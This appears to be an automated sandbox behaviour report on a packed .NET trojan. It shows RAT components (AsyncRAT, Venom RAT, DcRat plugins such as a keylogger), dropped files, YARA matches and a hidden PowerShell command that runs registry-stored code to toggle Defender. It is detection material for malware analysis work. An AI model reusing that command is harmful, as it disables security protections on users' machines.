Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: atlthunk.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: securityhealthsso.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\SecurityHealthSystray.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\net1.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source:	Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source:	Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Extra.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3812.tmp.dmp.30.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: Loader.exe, 00000014.00000002.2812581762.000000001CA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Extra.pdb` source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: lib.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: Loader.exe, 00000014.00000002.2744256904.000000001B430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: Loaader.exe, 00000015.00000002.3394522285.0000000013094000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3269125954.00000000014A0000.00000004.08000000.00040000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\Ninja\Downloads\dcrat_fix-master\dcrat_fix-master\MessagePack\bin\Release\MessagePackLib.pdb source: Loaader.exe, 00000015.00000002.3552953263.000000001CB50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb@ source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.polly.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: MessagePackLib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: ion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb; source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: Loader.exe, 00000014.00000002.2744918575.000000001B440000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Client.exe.0.dr, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])

Binary or sample is protected by dotNetProtector

Source: Loaader.exe, 00000015.00000002.3279406643.0000000002F00000.00000004.08000000.00040000.00000000.sdmp

String found in binary or memory: dotNetProtector

Suspicious powershell command line found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}

Yara detected Costura Assembly Loader

Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR

Source: WinDefend.exe.0.dr

Static PE information: 0xCB2C3ED5 [Thu Jan 6 06:01:57 2078 UTC]

Source: WinDefend.exe.0.dr	Static PE information: section name: %q2hF6
Source: WinDefend.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Code function: 0_2_00007FF848F200BD pushad ; iretd	0_2_00007FF848F200C1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Code function: 2_2_00007FF848F000BD pushad ; iretd	2_2_00007FF848F000C1
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Code function: 3_2_00007FF848F100BD pushad ; iretd	3_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53CF push edx; iretd	4_2_02CF53D2
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53AF push ecx; iretd	4_2_02CF53B6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF53AB push ecx; iretd	4_2_02CF53AE
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16DF push cs; iretd	4_2_02CF16E6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF16B3 push cs; iretd	4_2_02CF16BA
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF1641 push ss; iretd	4_2_02CF1642
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF545B push ebx; iretd	4_2_02CF5462
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF546B push edx; iretd	4_2_02CF546E
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF541F push eax; iretd	4_2_02CF5426
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF25BF push ds; iretd	4_2_02CF25C6
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Code function: 4_2_02CF2577 push ds; iretd	4_2_02CF2586
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 18_2_00007FF848F400BD pushad ; iretd	18_2_00007FF848F400C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 19_2_00007FF848F100BD pushad ; iretd	19_2_00007FF848F100C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F4792B push ebx; retf	20_2_00007FF848F4796A
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F4614A pushfd ; ret	20_2_00007FF848F46191
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F48167 push ebx; ret	20_2_00007FF848F4816A
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F46192 push edi; ret	20_2_00007FF848F461D6
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F43C10 push esi; retf 5F4Ah	20_2_00007FF848F55AD7
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F47C5E push eax; retf	20_2_00007FF848F47C6D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F47BCE pushad ; retf	20_2_00007FF848F47C5D
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF848F300BD pushad ; iretd	20_2_00007FF848F300C1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF849121A34 push ss; iretd	20_2_00007FF849121A38
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EEF5 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F15587 push ecx; iretd	21_2_00007FF848F155DC
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0F020 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F000BD pushad ; iretd	21_2_00007FF848F000C1
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EF70 pushad ; retf	21_2_00007FF848F0F149
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Code function: 21_2_00007FF848F0EF98 pushad ; retf	21_2_00007FF848F0F149

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Static PE information: section name: .text entropy: 7.992585946584666
Source: WinDefend.exe.0.dr	Static PE information: section name: %q2hF6 entropy: 7.9947379715100375

Source: C:\Users\user\AppData\Local\Temp\Client.exe	File created: C:\Users\user\AppData\Roaming\Loader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\Infected.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	File created: C:\Users\user\AppData\Roaming\Loaader.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\Client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	File created: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE
